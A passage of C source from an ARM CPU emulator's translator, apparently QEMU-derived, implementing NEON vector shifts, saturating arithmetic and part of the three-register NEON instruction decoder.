gen_ushl_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec dst, TCGv_vec src, TCGv_vec shift) { TCGv_vec lval = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec rval = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec lsh = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec rsh = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec msk, max; tcg_gen_neg_vec(tcg_ctx, vece, rsh, shift); if (vece == MO_8) { tcg_gen_mov_vec(tcg_ctx, lsh, shift); } else { msk = tcg_temp_new_vec_matching(tcg_ctx, dst); tcg_gen_dupi_vec(tcg_ctx, vece, msk, 0xff); tcg_gen_and_vec(tcg_ctx, vece, lsh, shift, msk); tcg_gen_and_vec(tcg_ctx, vece, rsh, rsh, msk); tcg_temp_free_vec(tcg_ctx, msk); } /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_shlv_vec(tcg_ctx, vece, lval, src, lsh); tcg_gen_shrv_vec(tcg_ctx, vece, rval, src, rsh); max = tcg_temp_new_vec_matching(tcg_ctx, dst); tcg_gen_dupi_vec(tcg_ctx, vece, max, 8 << vece); /* * The choice of LT (signed) and GEU (unsigned) are biased toward * the instructions of the x86_64 host. For MO_8, the whole byte * is significant so we must use an unsigned compare; otherwise we * have already masked to a byte and so a signed compare works. * Other tcg hosts have a full set of comparisons and do not care. */ if (vece == MO_8) { tcg_gen_cmp_vec(tcg_ctx, TCG_COND_GEU, vece, lsh, lsh, max); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_GEU, vece, rsh, rsh, max); tcg_gen_andc_vec(tcg_ctx, vece, lval, lval, lsh); tcg_gen_andc_vec(tcg_ctx, vece, rval, rval, rsh); } else { tcg_gen_cmp_vec(tcg_ctx, TCG_COND_LT, vece, lsh, lsh, max); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_LT, vece, rsh, rsh, max); tcg_gen_and_vec(tcg_ctx, vece, lval, lval, lsh); tcg_gen_and_vec(tcg_ctx, vece, rval, rval, rsh); } tcg_gen_or_vec(tcg_ctx, vece, dst, lval, rval); tcg_temp_free_vec(tcg_ctx, max); tcg_temp_free_vec(tcg_ctx, lval); tcg_temp_free_vec(tcg_ctx, rval); tcg_temp_free_vec(tcg_ctx, lsh); tcg_temp_free_vec(tcg_ctx, rsh); } static const TCGOpcode ushl_list[] = { INDEX_op_neg_vec, INDEX_op_shlv_vec, INDEX_op_shrv_vec, INDEX_op_cmp_vec, 0 }; const GVecGen3 ushl_op[4] = { { .fniv = gen_ushl_vec, .fno = gen_helper_gvec_ushl_b, .opt_opc = ushl_list, .vece = MO_8 }, { .fniv = gen_ushl_vec, .fno = gen_helper_gvec_ushl_h, .opt_opc = ushl_list, .vece = MO_16 }, { .fni4 = gen_ushl_i32, .fniv = gen_ushl_vec, .opt_opc = ushl_list, .vece = MO_32 }, { .fni8 = gen_ushl_i64, .fniv = gen_ushl_vec, .opt_opc = ushl_list, .vece = MO_64 }, }; void gen_sshl_i32(TCGContext *tcg_ctx, TCGv_i32 dst, TCGv_i32 src, TCGv_i32 shift) { TCGv_i32 lval = tcg_temp_new_i32(tcg_ctx); TCGv_i32 rval = tcg_temp_new_i32(tcg_ctx); TCGv_i32 lsh = tcg_temp_new_i32(tcg_ctx); TCGv_i32 rsh = tcg_temp_new_i32(tcg_ctx); TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); TCGv_i32 max = tcg_const_i32(tcg_ctx, 31); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_ext8s_i32(tcg_ctx, lsh, shift); tcg_gen_neg_i32(tcg_ctx, rsh, lsh); tcg_gen_shl_i32(tcg_ctx, lval, src, lsh); tcg_gen_umin_i32(tcg_ctx, rsh, rsh, max); tcg_gen_sar_i32(tcg_ctx, rval, src, rsh); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LEU, lval, lsh, max, lval, zero); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, dst, lsh, zero, rval, lval); tcg_temp_free_i32(tcg_ctx, lval); tcg_temp_free_i32(tcg_ctx, rval); tcg_temp_free_i32(tcg_ctx, lsh); tcg_temp_free_i32(tcg_ctx, rsh); tcg_temp_free_i32(tcg_ctx, zero); tcg_temp_free_i32(tcg_ctx, max); } void gen_sshl_i64(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, TCGv_i64 shift) { TCGv_i64 lval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 rval = tcg_temp_new_i64(tcg_ctx); TCGv_i64 lsh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 rsh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); TCGv_i64 max = tcg_const_i64(tcg_ctx, 63); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_ext8s_i64(tcg_ctx, lsh, shift); tcg_gen_neg_i64(tcg_ctx, rsh, lsh); tcg_gen_shl_i64(tcg_ctx, lval, src, lsh); tcg_gen_umin_i64(tcg_ctx, rsh, rsh, max); tcg_gen_sar_i64(tcg_ctx, rval, src, rsh); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LEU, lval, lsh, max, lval, zero); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, dst, lsh, zero, rval, lval); tcg_temp_free_i64(tcg_ctx, lval); tcg_temp_free_i64(tcg_ctx, rval); tcg_temp_free_i64(tcg_ctx, lsh); tcg_temp_free_i64(tcg_ctx, rsh); tcg_temp_free_i64(tcg_ctx, zero); tcg_temp_free_i64(tcg_ctx, max); } static void gen_sshl_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec dst, TCGv_vec src, TCGv_vec shift) { TCGv_vec lval = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec rval = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec lsh = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec rsh = tcg_temp_new_vec_matching(tcg_ctx, dst); TCGv_vec tmp = tcg_temp_new_vec_matching(tcg_ctx, dst); /* * Rely on the TCG guarantee that out of range shifts produce * unspecified results, not undefined behaviour (i.e. no trap). * Discard out-of-range results after the fact. */ tcg_gen_neg_vec(tcg_ctx, vece, rsh, shift); if (vece == MO_8) { tcg_gen_mov_vec(tcg_ctx, lsh, shift); } else { tcg_gen_dupi_vec(tcg_ctx, vece, tmp, 0xff); tcg_gen_and_vec(tcg_ctx, vece, lsh, shift, tmp); tcg_gen_and_vec(tcg_ctx, vece, rsh, rsh, tmp); } /* Bound rsh so out of bound right shift gets -1. */ tcg_gen_dupi_vec(tcg_ctx, vece, tmp, (8 << vece) - 1); tcg_gen_umin_vec(tcg_ctx, vece, rsh, rsh, tmp); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_GT, vece, tmp, lsh, tmp); tcg_gen_shlv_vec(tcg_ctx, vece, lval, src, lsh); tcg_gen_sarv_vec(tcg_ctx, vece, rval, src, rsh); /* Select in-bound left shift. */ tcg_gen_andc_vec(tcg_ctx, vece, lval, lval, tmp); /* Select between left and right shift. */ if (vece == MO_8) { tcg_gen_dupi_vec(tcg_ctx, vece, tmp, 0); tcg_gen_cmpsel_vec(tcg_ctx, TCG_COND_LT, vece, dst, lsh, tmp, rval, lval); } else { tcg_gen_dupi_vec(tcg_ctx, vece, tmp, 0x80); tcg_gen_cmpsel_vec(tcg_ctx, TCG_COND_LT, vece, dst, lsh, tmp, lval, rval); } tcg_temp_free_vec(tcg_ctx, lval); tcg_temp_free_vec(tcg_ctx, rval); tcg_temp_free_vec(tcg_ctx, lsh); tcg_temp_free_vec(tcg_ctx, rsh); tcg_temp_free_vec(tcg_ctx, tmp); } static const TCGOpcode sshl_list[] = { INDEX_op_neg_vec, INDEX_op_umin_vec, INDEX_op_shlv_vec, INDEX_op_sarv_vec, INDEX_op_cmp_vec, INDEX_op_cmpsel_vec, 0 }; const GVecGen3 sshl_op[4] = { { .fniv = gen_sshl_vec, .fno = gen_helper_gvec_sshl_b, .opt_opc = sshl_list, .vece = MO_8 }, { .fniv = gen_sshl_vec, .fno = gen_helper_gvec_sshl_h, .opt_opc = sshl_list, .vece = MO_16 }, { .fni4 = gen_sshl_i32, .fniv = gen_sshl_vec, .opt_opc = sshl_list, .vece = MO_32 }, { .fni8 = gen_sshl_i64, .fniv = gen_sshl_vec, .opt_opc = sshl_list, .vece = MO_64 }, }; static void gen_uqadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, TCGv_vec sat, TCGv_vec a, TCGv_vec b) { TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); tcg_gen_add_vec(tcg_ctx, vece, x, a, b); tcg_gen_usadd_vec(tcg_ctx, vece, t, a, b); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, x, x, t); tcg_gen_or_vec(tcg_ctx, vece, sat, sat, x); tcg_temp_free_vec(tcg_ctx, x); } static const TCGOpcode vecop_list_uqadd[] = { INDEX_op_usadd_vec, INDEX_op_cmp_vec, INDEX_op_add_vec, 0 }; const GVecGen4 uqadd_op[4] = { { .fniv = gen_uqadd_vec, .fno = gen_helper_gvec_uqadd_b, .write_aofs = true, .opt_opc = vecop_list_uqadd, .vece = MO_8 }, { .fniv = gen_uqadd_vec, .fno = gen_helper_gvec_uqadd_h, .write_aofs = true, .opt_opc = vecop_list_uqadd, .vece = MO_16 }, { .fniv = gen_uqadd_vec, .fno = gen_helper_gvec_uqadd_s, .write_aofs = true, .opt_opc = vecop_list_uqadd, .vece = MO_32 }, { .fniv = gen_uqadd_vec, .fno = gen_helper_gvec_uqadd_d, .write_aofs = true, .opt_opc = vecop_list_uqadd, .vece = MO_64 }, }; static void gen_sqadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, TCGv_vec sat, TCGv_vec a, TCGv_vec b) { TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); tcg_gen_add_vec(tcg_ctx, vece, x, a, b); tcg_gen_ssadd_vec(tcg_ctx, vece, t, a, b); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, x, x, t); tcg_gen_or_vec(tcg_ctx, vece, sat, sat, x); tcg_temp_free_vec(tcg_ctx, x); } static const TCGOpcode vecop_list_sqadd[] = { INDEX_op_ssadd_vec, INDEX_op_cmp_vec, INDEX_op_add_vec, 0 }; const GVecGen4 sqadd_op[4] = { { .fniv = gen_sqadd_vec, .fno = gen_helper_gvec_sqadd_b, .opt_opc = vecop_list_sqadd, .write_aofs = true, .vece = MO_8 }, { .fniv = gen_sqadd_vec, .fno = gen_helper_gvec_sqadd_h, .opt_opc = vecop_list_sqadd, .write_aofs = true, .vece = MO_16 }, { .fniv = gen_sqadd_vec, .fno = gen_helper_gvec_sqadd_s, .opt_opc = vecop_list_sqadd, .write_aofs = true, .vece = MO_32 }, { .fniv = gen_sqadd_vec, .fno = gen_helper_gvec_sqadd_d, .opt_opc = vecop_list_sqadd, .write_aofs = true, .vece = MO_64 }, }; static void gen_uqsub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, TCGv_vec sat, TCGv_vec a, TCGv_vec b) { TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); tcg_gen_sub_vec(tcg_ctx, vece, x, a, b); tcg_gen_ussub_vec(tcg_ctx, vece, t, a, b); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, x, x, t); tcg_gen_or_vec(tcg_ctx, vece, sat, sat, x); tcg_temp_free_vec(tcg_ctx, x); } static const TCGOpcode vecop_list_uqsub[] = { INDEX_op_ussub_vec, INDEX_op_cmp_vec, INDEX_op_sub_vec, 0 }; const GVecGen4 uqsub_op[4] = { { .fniv = gen_uqsub_vec, .fno = gen_helper_gvec_uqsub_b, .opt_opc = vecop_list_uqsub, .write_aofs = true, .vece = MO_8 }, { .fniv = gen_uqsub_vec, .fno = gen_helper_gvec_uqsub_h, .opt_opc = vecop_list_uqsub, .write_aofs = true, .vece = MO_16 }, { .fniv = gen_uqsub_vec, .fno = gen_helper_gvec_uqsub_s, .opt_opc = vecop_list_uqsub, .write_aofs = true, .vece = MO_32 }, { .fniv = gen_uqsub_vec, .fno = gen_helper_gvec_uqsub_d, .opt_opc = vecop_list_uqsub, .write_aofs = true, .vece = MO_64 }, }; static void gen_sqsub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec t, TCGv_vec sat, TCGv_vec a, TCGv_vec b) { TCGv_vec x = tcg_temp_new_vec_matching(tcg_ctx, t); tcg_gen_sub_vec(tcg_ctx, vece, x, a, b); tcg_gen_sssub_vec(tcg_ctx, vece, t, a, b); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_NE, vece, x, x, t); tcg_gen_or_vec(tcg_ctx, vece, sat, sat, x); tcg_temp_free_vec(tcg_ctx, x); } static const TCGOpcode vecop_list_sqsub[] = { INDEX_op_sssub_vec, INDEX_op_cmp_vec, INDEX_op_sub_vec, 0 }; const GVecGen4 sqsub_op[4] = { { .fniv = gen_sqsub_vec, .fno = gen_helper_gvec_sqsub_b, .opt_opc = vecop_list_sqsub, .write_aofs = true, .vece = MO_8 }, { .fniv = gen_sqsub_vec, .fno = gen_helper_gvec_sqsub_h, .opt_opc = vecop_list_sqsub, .write_aofs = true, .vece = MO_16 }, { .fniv = gen_sqsub_vec, .fno = gen_helper_gvec_sqsub_s, .opt_opc = vecop_list_sqsub, .write_aofs = true, .vece = MO_32 }, { .fniv = gen_sqsub_vec, .fno = gen_helper_gvec_sqsub_d, .opt_opc = vecop_list_sqsub, .write_aofs = true, .vece = MO_64 }, }; /* Translate a NEON data processing instruction. Return nonzero if the instruction is invalid. We process data in a mixture of 32-bit and 64-bit chunks. Mostly we use 32-bit chunks so we can use normal scalar instructions. */ static int disas_neon_data_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op; int q; int rd, rn, rm, rd_ofs, rn_ofs, rm_ofs; int size; int shift; int pass; int count; int pairwise; int u; int vec_size; uint32_t imm; TCGv_i32 tmp, tmp2, tmp3, tmp4, tmp5; TCGv_ptr ptr1, ptr2, ptr3; TCGv_i64 tmp64; /* FIXME: this access check should not take precedence over UNDEF * for invalid encodings; we will generate incorrect syndrome information * for attempts to execute invalid vfp/neon encodings with FP disabled. */ if (s->fp_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_simd_access_trap(1, 0xe, false), s->fp_excp_el); return 0; } if (!s->vfp_enabled) return 1; q = (insn & (1 << 6)) != 0; u = (insn >> 24) & 1; VFP_DREG_D(rd, insn); VFP_DREG_N(rn, insn); VFP_DREG_M(rm, insn); size = (insn >> 20) & 3; vec_size = q ? 16 : 8; rd_ofs = neon_reg_offset(rd, 0); rn_ofs = neon_reg_offset(rn, 0); rm_ofs = neon_reg_offset(rm, 0); if ((insn & (1 << 23)) == 0) { /* Three register same length. */ op = ((insn >> 7) & 0x1e) | ((insn >> 4) & 1); /* Catch invalid op and bad size combinations: UNDEF */ if ((neon_3r_sizes[op] & (1 << size)) == 0) { return 1; } /* All insns of this form UNDEF for either this condition or the * superset of cases "Q==1"; we catch the latter later. */ if (q && ((rd | rn | rm) & 1)) { return 1; } switch (op) { case NEON_3R_SHA: /* The SHA-1/SHA-256 3-register instructions require special * treatment here, as their size field is overloaded as an * op type selector, and they all consume their input in a * single pass. */ if (!q) { return 1; } if (!u) { /* SHA-1 */ if (!dc_isar_feature(aa32_sha1, s)) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rn); ptr3 = vfp_reg_ptr(tcg_ctx, true, rm); tmp4 = tcg_const_i32(tcg_ctx, size); gen_helper_crypto_sha1_3reg(tcg_ctx, ptr1, ptr2, ptr3, tmp4); tcg_temp_free_i32(tcg_ctx, tmp4); } else { /* SHA-256 */ if (!dc_isar_feature(aa32_sha2, s) || size == 3) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rn); ptr3 = vfp_reg_ptr(tcg_ctx, true, rm); switch (size) { case 0: gen_helper_crypto_sha256h(tcg_ctx, ptr1, ptr2, ptr3); break; case 1: gen_helper_crypto_sha256h2(tcg_ctx, ptr1, ptr2, ptr3); break; case 2: gen_helper_crypto_sha256su1(tcg_ctx, ptr1, ptr2, ptr3); break; } } tcg_temp_free_ptr(tcg_ctx, ptr1); tcg_temp_free_ptr(tcg_ctx, ptr2); tcg_temp_free_ptr(tcg_ctx, ptr3); return 0; case NEON_3R_VPADD_VQRDMLAH: if (!u) { break; /* VPADD */ } /* VQRDMLAH */ switch (size) { case 1: return do_v81_helper(s, gen_helper_gvec_qrdmlah_s16, q, rd, rn, rm); case 2: return do_v81_helper(s, gen_helper_gvec_qrdmlah_s32, q, rd, rn, rm); } return 1; case NEON_3R_VFM_VQRDMLSH: if (!u) { /* VFM, VFMS */ if (size == 1) { return 1; } break; } /* VQRDMLSH */ switch (size) { case 1: return do_v81_helper(s, gen_helper_gvec_qrdmlsh_s16, q, rd, rn, rm); case 2: return do_v81_helper(s, gen_helper_gvec_qrdmlsh_s32, q, rd, rn, rm); } return 1; case NEON_3R_LOGIC: /* Logic ops. */ switch ((u << 2) | size) { case 0: /* VAND */ tcg_gen_gvec_and(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 1: /* VBIC */ tcg_gen_gvec_andc(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 2: /* VORR */ tcg_gen_gvec_or(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 3: /* VORN */ tcg_gen_gvec_orc(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 4: /* VEOR */ tcg_gen_gvec_xor(tcg_ctx, 0, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 5: /* VBSL */ tcg_gen_gvec_bitsel(tcg_ctx, MO_8, rd_ofs, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); break; case 6: /* VBIT */ tcg_gen_gvec_bitsel(tcg_ctx, MO_8, rd_ofs, rm_ofs, rn_ofs, rd_ofs, vec_size, vec_size); break; case 7: /* VBIF */ tcg_gen_gvec_bitsel(tcg_ctx, MO_8, rd_ofs, rm_ofs, rd_ofs, rn_ofs, vec_size, vec_size); break; } return 0; case NEON_3R_VADD_VSUB: if (u) { tcg_gen_gvec_sub(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } else { tcg_gen_gvec_add(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } return 0; case NEON_3R_VQADD: tcg_gen_gvec_4(tcg_ctx, rd_ofs, offsetof(CPUARMState, vfp.qc), rn_ofs, rm_ofs, vec_size, vec_size, (u ? uqadd_op : sqadd_op) + size); return 0; case NEON_3R_VQSUB: tcg_gen_gvec_4(tcg_ctx, rd_ofs, offsetof(CPUARMState, vfp.qc), rn_ofs, rm_ofs, vec_size, vec_size, (u ? uqsub_op : sqsub_op) + size); return 0; case NEON_3R_VMUL: /* VMUL */ if (u) { /* Polynomial case allows only P8. */ if (size != 0) { return 1; } tcg_gen_gvec_3_ool(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size, 0, gen_helper_gvec_pmul_b); } else { tcg_gen_gvec_mul(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } return 0; case NEON_3R_VML: /* VMLA, VMLS */ tcg_gen_gvec_3(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size, u ? &mls_op[size] : &mla_op[size]); return 0; case NEON_3R_VTST_VCEQ: if (u) { /* VCEQ */ tcg_gen_gvec_cmp(tcg_ctx, TCG_COND_EQ, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } else { /* VTST */ tcg_gen_gvec_3(tcg_ctx, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size, &cmtst_op[size]); } return 0; case NEON_3R_VCGT: tcg_gen_gvec_cmp(tcg_ctx, u ? TCG_COND_GTU : TCG_COND_GT, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); return 0; case NEON_3R_VCGE: tcg_gen_gvec_cmp(tcg_ctx, u ? TCG_COND_GEU : TCG_COND_GE, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); return 0; case NEON_3R_VMAX: if (u) { tcg_gen_gvec_umax(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } else { tcg_gen_gvec_smax(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } return 0; case NEON_3R_VMIN: if (u) { tcg_gen_gvec_umin(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } else { tcg_gen_gvec_smin(tcg_ctx, size, rd_ofs, rn_ofs, rm_ofs, vec_size, vec_size); } return 0; case NEON_3R_VSHL: /* Note the operation is vshl vd,vm,vn */ tcg_gen_gvec_3(tcg_ctx, rd_ofs, rm_ofs, rn_ofs, vec_size, vec_size, u ? &ushl_op[size] : &sshl_op[size]); return 0; } if (size == 3) { /* 64-bit element instructions. */ for (pass = 0; pass < (q ? 2 : 1); pass++) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + pass); neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + pass); switch (op) { case NEON_3R_VQSHL: if (u) { gen_helper_neon_qshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } else { gen_helper_neon_qshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } break; case NEON_3R_VRSHL: if (u) { gen_helper_neon_rshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } else { gen_helper_neon_rshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } break; case NEON_3R_VQRSHL: if (u) { gen_helper_neon_qrshl_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } else { gen_helper_neon_qrshl_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, tcg_ctx->cpu_V1, tcg_ctx->cpu_V0); } break; default: abort(); } neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } return 0; } pairwise = 0; switch (op) { case NEON_3R_VQSHL: case NEON_3R_VRSHL: case NEON_3R_VQRSHL: { int rtmp; /* Shift instruction operands are reversed. */ rtmp = rn; rn = rm; rm = rtmp; } break; case NEON_3R_VPADD_VQRDMLAH: case NEON_3R_VPMAX: case NEON_3R_VPMIN: pairwise = 1; break; case NEON_3R_FLOAT_ARITH: pairwise = (u && size < 2); /* if VPADD (float) */ break; case NEON_3R_FLOAT_MINMAX: pairwise = u; /* if VPMIN/VPMAX (float) */ break; case NEON_3R_FLOAT_CMP: if (!u && size) { /* no encoding for U=0 C=1x */ return 1; } break; case NEON_3R_FLOAT_ACMP: if (!u) { return 1; } break; case NEON_3R_FLOAT_MISC: /* VMAXNM/VMINNM in ARMv8 */ if (u && !arm_dc_feature(s, ARM_FEATURE_V8)) { return 1; } break; case NEON_3R_VFM_VQRDMLSH: if (!dc_isar_feature(aa32_simdfmac, s)) { return 1; } break; default: break; } if (pairwise && q) { /* All the pairwise insns UNDEF if Q is set */ return 1; } for (pass = 0; pass < (q ? 4 : 2); pass++) { if (pairwise) { /* Pairwise. */ if (pass < 1) { tmp = neon_load_reg(tcg_ctx, rn, 0); tmp2 = neon_load_reg(tcg_ctx, rn, 1); } else { tmp = neon_load_reg(tcg_ctx, rm, 0); tmp2 = neon_load_reg(tcg_ctx, rm, 1); } } else { /* Elementwise. */ tmp = neon_load_reg(tcg_ctx, rn, pass); tmp2 = neon_load_reg(tcg_ctx, rm, pass); } switch (op) { case NEON_3R_VHADD: GEN_NEON_INTEGER_OP(hadd); break; case NEON_3R_VRHADD: GEN_NEON_INTEGER_OP(rhadd); break; case NEON_3R_VHSUB: GEN_NEON_INTEGER_OP(hsub); break; case NEON_3R_VQSHL: GEN_NEON_INTEGER_OP_ENV(qshl); break; case NEON_3R_VRSHL: GEN_NEON_INTEGER_OP(rshl); break; case NEON_3R_VQRSHL: GEN_NEON_INTEGER_OP_ENV(qrshl); break; case NEON_3R_VABD: GEN_NEON_INTEGER_OP(abd); break; case NEON_3R_VABA: GEN_NEON_INTEGER_OP(abd); tcg_temp_free_i32(tcg_ctx, tmp2); tmp2 = neon_load_reg(tcg_ctx, rd, pass); gen_neon_add(tcg_ctx, size, tmp, tmp2); break; case NEON_3R_VPMAX: GEN_NEON_INTEGER_OP(pmax); break; case NEON_3R_VPMIN: GEN_NEON_INTEGER_OP(pmin); break; case NEON_3R_VQDMULH_VQRDMULH: /* Multiply high. */ if (!u) { /* VQDMULH */ switch (size) { case 1: gen_helper_neon_qdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; case 2: gen_helper_neon_qdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; default: abort(); } } else { /* VQRDMULH */ switch (size) { case 1: gen_helper_neon_qrdmulh_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; case 2: gen_helper_neon_qrdmulh_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); break; default: abort(); } } break; case NEON_3R_VPADD_VQRDMLAH: switch (size) { case 0: gen_helper_neon_padd_u8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_padd_u16(tcg_ctx, tmp, tmp, tmp2); break; case 2: tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } break; case NEON_3R_FLOAT_ARITH: /* Floating point arithmetic. */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); switch ((u << 2) | size) { case 0: /* VADD */ case 4: /* VPADD */ gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); break; case 2: /* VSUB */ gen_helper_vfp_subs(tcg_ctx, tmp, tmp, tmp2, fpstatus); break; case 6: /* VABD */ gen_helper_neon_abd_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); break; default: abort(); } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_MULTIPLY: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_muls(tcg_ctx, tmp, tmp, tmp2, fpstatus); if (!u) { tcg_temp_free_i32(tcg_ctx, tmp2); tmp2 = neon_load_reg(tcg_ctx, rd, pass); if (size == 0) { gen_helper_vfp_adds(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_vfp_subs(tcg_ctx, tmp, tmp2, tmp, fpstatus); } } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_CMP: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); if (!u) { gen_helper_neon_ceq_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { if (size == 0) { gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_ACMP: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); if (size == 0) { gen_helper_neon_acge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_neon_acgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_MINMAX: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); if (size == 0) { gen_helper_vfp_maxs(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_vfp_mins(tcg_ctx, tmp, tmp, tmp2, fpstatus); } tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_3R_FLOAT_MISC: if (u) { /* VMAXNM/VMINNM */ TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); if (size == 0) { gen_helper_vfp_maxnums(tcg_ctx, tmp, tmp, tmp2, fpstatus); } else { gen_helper_vfp_minnums(tcg_ctx, tmp, tmp, tmp2, fpstatus); } tcg_temp_free_ptr(tcg_ctx, fpstatus); } else { if (size == 0) { gen_helper_recps_f32(tcg_ctx, tmp, tmp, tmp2, tcg_ctx->cpu_env); } else { gen_helper_rsqrts_f32(tcg_ctx, tmp, tmp, tmp2, tcg_ctx->cpu_env); } } break; case NEON_3R_VFM_VQRDMLSH: { /* VFMA, VFMS: fused multiply-add */ TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); TCGv_i32 tmp3 = neon_load_reg(tcg_ctx, rd, pass); if (size) { /* VFMS */ gen_helper_vfp_negs(tcg_ctx, tmp, tmp); } gen_helper_vfp_muladds(tcg_ctx, tmp, tmp, tmp2, tmp3, fpstatus); 